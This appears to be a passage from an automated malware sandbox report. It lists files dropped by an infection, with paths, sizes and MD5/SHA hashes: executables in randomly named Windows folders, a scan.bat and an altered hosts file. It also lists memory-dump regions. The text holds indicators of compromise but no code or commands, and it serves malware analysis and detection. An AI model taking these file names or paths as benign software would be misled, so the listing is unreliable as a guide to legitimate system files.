c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\ime\bubpucp.exe

Filesize
660KB

MD5
c1613275166c6405effba519370810e4

SHA1
bd059e4f27065e973eacdf493a0a35f2337d2e73

SHA256
788dad6f9f7319e9fe79050fbdd3e41777208e736a44fa20b2df205efa5facd6

SHA512
e0a3f5f1fb7121a8e214c8eb630f8c5a1d9a808c20ec348cbc140509d037c4770a2387d9c01acc785e53b751864be2dc5533da2ea5a500d48a6aa7dc867871c5

Download Submit
C:\Windows\jgebjtcb\bubpucp.exe

Filesize
145KB

MD5
8c7d76f676043d84e69ba5b3e05dee74

SHA1
b40973e4b13a60530dac228c2818b771c2bdb321

SHA256
83db9eb12fefbdac56e423709a54519c817acf54f06d5101f652b6b153e9f5c1

SHA512
d1c713d6f43e47ff4ca2b16f2c38119720ee3282b60d8965131449f44533294b6b3f787725a06f0e2e7c9e6530641681d2410bbac0f7951a2b9aab6148ac0a2d

Download Submit
C:\Windows\jgebjtcb\bubpucp.exe

Filesize
85KB

MD5
612a32c03cc05810acb1aeddca2aca67

SHA1
5189375a2f6b777be9431430e0870ce629b4e689

SHA256
dff91d27a72cd05e15b3f7ea00d59ec488fb4f03feaad5fb2641abf9d4ff9161

SHA512
8d5399db4953917d2231974db305f6c7402f406798797bb680f3c06f4ad3dba510f2d053bd8b1f96299b1acdfeef2716cbc7140221e56cb78a7f8b3d1bfa68ae

Download Submit
C:\Windows\jgebjtcb\bubpucp.exe

Filesize
154KB

MD5
543ab99a8d78e5a59501bacdfaf5722d

SHA1
b58b89c984849e08a87152fd944e18014034dbfd

SHA256
8b0801d34e0fa71dac173bb40d9fadccbddfa1814c6cb1c68ecae8dd0f18fc44

SHA512
dcd2d15c551ccb8583b4facfcea62dbd291881fb2146cf03ccd7726cbb45699f3c546d7ce67a0516dc00ab1b3cd2eb559fec3bd50f642e26701dc2c2da662b78

Download Submit
C:\Windows\lsyqbeqew\Corporate\vfshost.exe

Filesize
286KB

MD5
021d17183275728fbd46f0eb18cee00f

SHA1
084fb75ecd8a1e0a70f206f69cecd5fb955e1f57

SHA256
f4ebfa299a5b179296dce0a516490b6a74b0abd629ae5b6e15e1c355aaf21439

SHA512
1776b66da78547e17c7c447540ece26a9a0acc9347f5918d829a34bf17963eb3937fa59367c6b344cdd6a855189553872dab7efe74410c6267cc87e3ac16f733

Download Submit
C:\Windows\lsyqbeqew\Corporate\vfshost.exe

Filesize
191KB

MD5
13ae67db08f908c2b4aeffbe0f094214

SHA1
17888eda9a121352e8b2fb7d4a506d44fc4df4d2

SHA256
6c0ffa4349d5f9126f46436cfe5704fc9289ef5893f8a8449273167a90d01069

SHA512
cc18b942fd93c514835041ef0b87958bf05240a9463795185a794a2705e66fc79357498782d9532b3cef8d194042c5279eef6a51ec963d6a8cd3115ed3732f89

Download Submit
C:\Windows\lsyqbeqew\ylzbebeqp\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\lsyqbeqew\ylzbebeqp\ip.txt

Filesize
158B

MD5
13fa0b338613ef8d8862a4bfe1fff155

SHA1
c0bacfb923f5fc343d89508d8af98fe6989611c1

SHA256
2f85bd5ee5e8c311a5e37327c2ef42a3085551eb6112bdc36964ffeb17d400ff

SHA512
d411aae23bde6a52bea6a0d777547efecef68fc857c901b3253bd8c1e2f90ab2dbcde400f960bbe1101339692912bcc8e6be433bbef3a9d92dc28c18210f6803

Download Submit
C:\Windows\lsyqbeqew\ylzbebeqp\scan.bat

Filesize
160B

MD5
b628d3e245911e9255d2578738ae8961

SHA1
7860f64547a048bb361024d0e1db21f8d058d9e5

SHA256
0ba34a905ddaec4deef0c554027821e21c71f7bdbd4128637c9684342e71dac8

SHA512
2cbee9f8cb6dee746ab102d81efa8bdc202b8ca5744a95f210a18ca59f7c8f544ba4d9513235d68fe3a34f22d9fd2ff49a10847febbb48cc90a50c8abc1c3be6

Download Submit
C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe

Filesize
367KB

MD5
b6926a9540922a63d0d707381a3ec7ab

SHA1
01034963c7f7dc537a528b3fd958190dc1bb800d

SHA256
336783504aadd3abd6f611ec9f93676ea981a5b2e2f60481537eb967221ab716

SHA512
ecd97a869f9b3591d9d05329a5bedfebb369ec096508df2e1698765dc2014b6656e34fb4a5498adba7dc5b3fa2fcda3995f7f05b8f2dc9530ae00bb9f77b1afd

Download Submit
C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe

Filesize
136KB

MD5
20edf5e2c7ac8f0fc245b851dd7ccaa6

SHA1
6cf04f00358a3e94008326e3e34a4eaea97a4dea

SHA256
a0b2d8e8ce5fff6890a1d180e1cf007eb092b43b6c908b932ad23c462945c83c

SHA512
b5ebaa04c17c13fa103253aa31512d34dbc6f637429b9d5a34e950a01f343e0a8100f21982edf00976b3f21a5b19a35ab91cd11596fb3e6164ec95cb62060fce

Download Submit
C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe

Filesize
328KB

MD5
e7ea0d52f4017087c03c1893dcafe9b1

SHA1
a9c390ea70c58cf21ad7b23fa71c65611f79119f

SHA256
95dc8cc7fa0d0e62d7b6b74ec8203f72257ed7d6e17bf8f12d60b72d77c8b81d

SHA512
1ed84c62575b0d0d59155491fb9022e6a36e3782dc889f952b89466171b7e7cae4626d6810beb6ada7be3cf9d057c3395b60c8bbe2b692163af7dd0f8242b84c

Download Submit
C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
975B

MD5
b5d815ff5310f62de5020591be598bc0

SHA1
8013562b0cc2516d16d474308c8982a31b7f5dd0

SHA256
a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

SHA512
4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

Download Submit
\Windows\Temp\nso81B0.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
\Windows\Temp\nso81B0.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
\Windows\jgebjtcb\bubpucp.exe

Filesize
368KB

MD5
6f9bb0f52ebeaaf2bdcc1a9d3f170683

SHA1
b8c78a73b310fd1670c48d3c5d28d83d6fb5796e

SHA256
d9ced94b4d77fb7ee001818c57da3901415e0f08d1df576a3ee6a6bff46bf88b

SHA512
07758b4e696bf6661159d924109be5a2fbd9377383eaf7bb7c9cb516a551a40b1d91c1d80e45dcf48dc4b881ecd4e0a86ce65e2c33764828902c46ca539550fa

Download Submit
\Windows\jgebjtcb\bubpucp.exe

Filesize
167KB

MD5
fbc31e716120aff2ab1541691d3b2177

SHA1
4566762ccd9ecd60d5dda61f50f905dd341d5b44

SHA256
ce8756115aad11308583810d0865588993b50e3deb4a0ea7fefcc74cb8afd532

SHA512
62e88d53efe5388795fbf844a83527dc77417e1da9f9a24998151c306adce0909aae41d97403cdb33bdc2ec75d5c9eb1807e37a9da3037f7a4815233fce49c0b

Download Submit
\Windows\lsyqbeqew\Corporate\vfshost.exe

Filesize
267KB

MD5
900ce1b2d502c503c7712095fd4b3df1

SHA1
655374082ff79b6873dcc3dc16d0e0e9e2939041

SHA256
4624ff3be69f14f1ae7d071c353db3ca99f1d6dcbf385ff361147f524a4561ec

SHA512
35e37b3ed255f78a7f07ec7f77849cff590872d57036f30133a2c5d4d19b5db1c5fa8dfd5d716c9d2494e28e261b3e36e04a4d4a59af6bdbac3569bdbdeb0f97

Download Submit
\Windows\lsyqbeqew\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
\Windows\lsyqbeqew\ylzbebeqp\tnplbywcb.exe

Filesize
63KB

MD5
821ea58e3e9b6539ff0affd40e59f962

SHA1
635a301d847f3a2e85f21f7ee12add7692873569

SHA256
a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

SHA512
0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

Download Submit
\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
memory/448-338-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-336-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-170-0x0000000000130000-0x0000000000134000-memory.dmp

Filesize
16KB

Download
memory/448-340-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-171-0x0000000000140000-0x0000000000144000-memory.dmp

Filesize
16KB

Download
memory/448-308-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-168-0x0000000000120000-0x0000000000130000-memory.dmp

Filesize
64KB

Download
memory/448-341-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-167-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-208-0x0000000000130000-0x0000000000134000-memory.dmp

Filesize
16KB

Download
memory/448-174-0x0000000000360000-0x0000000000364000-memory.dmp

Filesize
16KB

Download
memory/448-173-0x0000000000350000-0x0000000000354000-memory.dmp

Filesize
16KB

Download
memory/448-213-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-197-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-218-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-217-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-329-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-214-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/448-207-0x000000013F300000-0x000000013F420000-memory.dmp

Filesize
1.1MB

Download
memory/536-146-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/628-188-0x000000013FDC0000-0x000000013FE1B000-memory.dmp

Filesize
364KB

Download
memory/628-186-0x000000013FDC0000-0x000000013FE1B000-memory.dmp

Filesize
364KB

Download
memory/896-179-0x000000013F6F0000-0x000000013F74B000-memory.dmp

Filesize
364KB

Download
memory/896-181-0x000000013F6F0000-0x000000013F74B000-memory.dmp

Filesize
364KB

Download
memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp

Filesize
952KB

Download
memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp

Filesize
952KB

Download
memory/1408-74-0x00000000003B0000-0x00000000003FC000-memory.dmp

Filesize
304KB

Download
memory/1644-195-0x000000013F550000-0x000000013F5AB000-memory.dmp

Filesize
364KB

Download
memory/1644-193-0x000000013F550000-0x000000013F5AB000-memory.dmp

Filesize
364KB

Download
memory/1816-169-0x000000013F800000-0x000000013F85B000-memory.dmp

Filesize
364KB

Download
memory/1816-160-0x000000013F800000-0x000000013F85B000-memory.dmp

Filesize
364KB

Download
memory/1884-330-0x0000000000350000-0x0000000000362000-memory.dmp

Filesize
72KB

Download
memory/1980-134-0x0000000000530000-0x000000000061E000-memory.dmp

Filesize
952KB

Download
memory/1980-133-0x0000000000530000-0x000000000061E000-memory.dmp

Filesize
952KB

Download
memory/2080-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2656-202-0x000000013FC60000-0x000000013FCBB000-memory.dmp

Filesize
364KB

Download
memory/2656-204-0x000000013FC60000-0x000000013FCBB000-memory.dmp

Filesize
364KB

Download
memory/2700-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2788-166-0x0000000002BE0000-0x0000000002D00000-memory.dmp

Filesize
1.1MB

Download
memory/2788-159-0x0000000001A80000-0x0000000001ADB000-memory.dmp

Filesize
364KB

Download
memory/2788-206-0x0000000002BE0000-0x0000000002D00000-memory.dmp

Filesize
1.1MB

Download
memory/2788-178-0x0000000001A80000-0x0000000001ADB000-memory.dmp

Filesize
364KB

Download
memory/2788-201-0x0000000001A80000-0x0000000001ADB000-memory.dmp

Filesize
364KB

Download
memory/2788-216-0x0000000001A80000-0x0000000001ADB000-memory.dmp

Filesize
364KB

Download
memory/2788-215-0x0000000001A80000-0x0000000001ADB000-memory.dmp

Filesize
364KB

Download
memory/2980-331-0x0000000000CE0000-0x0000000000CF2000-memory.dmp

Filesize
72KB

Download